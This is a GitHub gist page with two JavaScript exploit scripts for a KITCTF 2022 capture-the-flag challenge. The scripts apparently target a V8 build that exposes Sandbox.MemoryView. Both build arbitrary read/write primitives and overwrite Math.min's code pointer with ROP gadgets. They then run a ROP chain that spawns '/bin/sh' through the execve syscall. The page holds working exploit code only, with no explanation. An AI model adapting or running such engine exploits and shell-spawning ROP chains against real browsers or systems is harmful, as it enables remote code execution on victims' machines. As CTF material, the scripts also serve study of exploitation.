Skip to content

Instantly share code, notes, and snippets.

@anvbis

anvbis/kitctfctf-2022_date.1.js

Last active December 12, 2022 00:02
Show Gist options
  • Save anvbis/a4c97a4c63c075be6f580529d4e98d31 to your computer and use it in GitHub Desktop.
Save anvbis/a4c97a4c63c075be6f580529d4e98d31 to your computer and use it in GitHub Desktop.
Download ZIP
kitctfctf-2022_date.js
Raw
kitctfctf-2022_date.1.js
let buf = new ArrayBuffer(8);
let f64 = new Float64Array(buf);
let i32 = new Uint32Array(buf);
let i64 = new BigUint64Array(buf);
const ftoi = x => {
f64[0] = x;
return i64[0];
};
const itof = x => {
i64[0] = x;
return f64[0];
};
const i32toi64 = x => {
i64[0] = 0n;
i32[0] = x;
return i64[0];
};
const addrof = o => Sandbox.getAddressOf(o);
const read32 = p => {
let buf = new Sandbox.MemoryView(p, 64);
let view = new DataView(buf);
return view.getUint32(0, true);
};
const read64 = p => {
let buf = new Sandbox.MemoryView(p, 64);
let view = new DataView(buf);
return view.getBigUint64(0, true);
};
const write64 = (p, x) => {
let buf = new Sandbox.MemoryView(p, 64);
let view = new DataView(buf);
return view.setBigUint64(0, x, true);
};
let code = read32(addrof(Math.min) + 0x18);
let entry_point = read64(code - 1 + 0xc);
let elf = entry_point - 0x1898380n;
let heap = read64(0x18) - 0x2140n
/* 0x0180d9ea: pop rdx; jmp qword ptr [rsi+0x41]; */
write64(code - 1 + 0xc, elf + 0x0180d9ean);
/* 0x017bb33a: pop rsp; add rsp, 0x10; pop rbp; ret; */
write64(addrof(this) + 0x7a, elf + 0x017bb33an);
let binsh = heap + i32toi64(addrof("/bin/sh") + 0xc);
let chain = [
elf + 0x01b1f86bn, binsh, /* 0x01b1f86b: pop rdi; ret; */
elf + 0x019cece6n, 0n, /* 0x019cece6: pop rsi; ret; */
elf + 0x01aacb42n, 0n, /* 0x01aacb42: pop rdx; ret; */
elf + 0x019fc265n, 59n, /* 0x019fc265: pop rax; ret; */
elf + 0x01abf80bn /* 0x01abf80b: syscall; */
];
let ptr = addrof(this) + 0x3909;
for (let i = 0; i < chain.length; i++)
write64(ptr + i*8, chain[i]);
Math.min();
Raw
kitctfctf-2022_date.2.js
let buf = new ArrayBuffer(8);
let f64 = new Float64Array(buf);
let i32 = new Uint32Array(buf);
let i64 = new BigUint64Array(buf);
const ftoi = x => {
f64[0] = x;
return i64[0];
};
const itof = x => {
i64[0] = x;
return f64[0];
};
const i32toi64 = x => {
i64[0] = 0n;
i32[0] = x;
return i64[0];
};
const addrof = o => Sandbox.getAddressOf(o);
const fakeobj = p => {
let obj = [{}];
let buf = new Sandbox.MemoryView(addrof(obj), 64);
let view = new DataView(buf);
let ptr = view.getUint32(8, true) - 1 + 8;
buf = new Sandbox.MemoryView(ptr, 64);
view = new DataView(buf);
view.setUint32(0, p + 1, true);
return obj[0];
};
const read32 = p => {
let buf = new Sandbox.MemoryView(p, 64);
let view = new DataView(buf);
return view.getUint32(0, true);
};
const read64 = p => {
let buf = new Sandbox.MemoryView(p, 64);
let view = new DataView(buf);
return view.getBigUint64(0, true);
};
const write64 = (p, x) => {
let buf = new Sandbox.MemoryView(p, 64);
let view = new DataView(buf);
return view.setBigUint64(0, x, true);
};
let code = read32(addrof(Math.min) + 0x18);
let entry_point = read64(code - 1 + 0xc);
let elf = entry_point - 0x1898380n;
let heap = read64(0x18) - 0x2140n
/* 0x019842c5: pop rsp; ret; */
write64(code - 1 + 0xc, elf + 0x01b16b01n);
/* 0x01b16b01: pop r15; pop rbp; jmp qword ptr [rsi+0x18]; */
write64(addrof(this) + 0x39 + 0x18, elf + 0x019842c5n);
let binsh = heap + i32toi64(addrof("/bin/sh") + 0xc);
let stack = [
itof(elf + 0x01b1f86bn), itof(binsh), /* 0x01b1f86b: pop rdi; ret; */
itof(elf + 0x019cece6n), itof(0n), /* 0x019cece6: pop rsi; ret; */
itof(elf + 0x01aacb42n), itof(0n), /* 0x01aacb42: pop rdx; ret; */
itof(elf + 0x019fc265n), itof(59n), /* 0x019fc265: pop rax; ret; */
itof(elf + 0x01abf80bn) /* 0x01abf80b: syscall; */
];
let o = fakeobj(addrof(stack) + 0x33);
Math.min(o);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment